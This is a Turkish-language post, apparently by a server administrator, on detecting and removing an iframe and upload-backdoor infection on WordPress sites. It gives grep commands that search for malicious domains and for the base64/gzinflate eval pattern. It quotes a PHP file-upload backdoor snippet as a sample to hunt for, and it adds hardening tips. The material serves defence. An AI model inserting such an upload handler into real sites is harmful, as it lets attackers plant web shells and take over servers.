Yaklaşık 5 gündür mevcut bir virüsün yapısını inceliyorum.Basit bir iframe virusu gibi görünsede gayet kapsamlı.

www.raptorsrepublic.com isimli sitenin kodları sitenize ekleniyor.Bu açıkta genel olarak ftpden bulaşmayıp genel wordpress sitelerden sunucuya geçmektedir.

Öncelikle raptorsrepublic ile ilgili bir vürus sitenize bulaşmışsa;
ssh hesabında root olarak sunucu sahibi;

1. yapılacak;

1.
find / -name "*"."*" -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
2.
find /home -name "*".php -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
3.
find /home -name "*".js -type f -print0 | xargs -0 grep http://www.raptorsrepublic.com
4.
find /home -name "*".php -type f -print0 | xargs -0 grep http://www.4ngel.net
5.
find /home -name "*".js -type f -print0 | xargs -0 grep http://www.4ngel.net
6.
find /home -type f -print0 -name "*.php*" | xargs -0 grep -l "eval(gzinflate(base64_decode"

yukarıdaki altı aramayı yapsın ve çıkan dosyaların yapısını incelesin.Buna benzer base64 veya ioncube şifreli upload izni veren scriptler kuruyorlar.mevcut dosyalarınıza bu kodu ekledikleri an siz sayfanız da göremesenizde siteniz bir upload makinasına dönüşüyor.istedikleri shelli yukleyip sitenize mudahale ediyorlar.

2. yapılacak:

Tüm hesapları suspend edip sunucuda alttaki kodu bulunduran dosyalar bulunsn.Tüm ftpnizdeki html ve php dosyalarda alttakine benzer upload sistemli dosyaları arayın.
if($_POST[git]){
		$isim = $say.$_FILES["dosya"]["name"];
		$dosyakaynak = $_FILES["dosya"]["tmp_name"]; 
		$dosyaisim = latinChars($isim); 
		$dosyauzanti = $_FILES["dosya"]["type"]; 
		$dosyaboyut = $_FILES["dosya"]["size"]; 
		$dosyahedef = "include/"; 
		$dosyayukle = move_uploaded_file($dosyakaynak,$dosyahedef.$dosyaisim);
}
?> 


<form action="ajax.php?id=curl" method="post" enctype="multipart/form-data">
<input type="file" name="dosya" />
<input type="submit" alue=" " name="git" />
Genel olarak bu aramayla uğraşmak istenilmiyorsa site sahibi tüm ftpsini sıfırlatsın.Sıfır wp kursun yada hangi scripti kullanıyorsa.

EN SON İSE wp-admin klasorunuz eğerki şifreli değilse hemen şifreleyin.Genel olarak hitli sitelerle uğraşıyorlar.Gene olarak curl kullanarak hesabınıza giriyorlar.Sitenizin sonuna wp-admin/admin-ajax.php?id=curl ekleyerek kendi sitenizdede benzer curl açıklarını gözlemleyebilirsiniz.

Yaklaşık 5 gün süren bir uğraş sonucu çözüme ulaştım.Herkes 5 gün harcamasın tüm wp site sahipleride uygulasın sitenize kod eklendikten birkaçgun sonra siteniz bu site bilgisayarınıza zarar verebilir uyarısı verecektir.
Ayrıca sunucu tmp dizininide mutlaka securetmp edin ve temizlemeden sonra mutlaka db user ve pass değerlerini değiştirip ioncube ile wp-config dosyanızı şifreleyin.

BUNUN DIŞINDA TUM WPTRDEN İNEN WPLERDE ŞUAN SHEL SCRİPT KENDİ İÇİNDE GELİYOR.YABANCI SÜRÜMÜ ŞUAN İNCELİYORUM.film izle gibi populer bir kelimedeki 10 siteden 2-3 unde ilk sayfada bu açığa rastladım.

Samet Yiğit
Dizinler arası geçiş için inceleyin: dizinler arası geçişi kapatmak
İyi çalışmalar.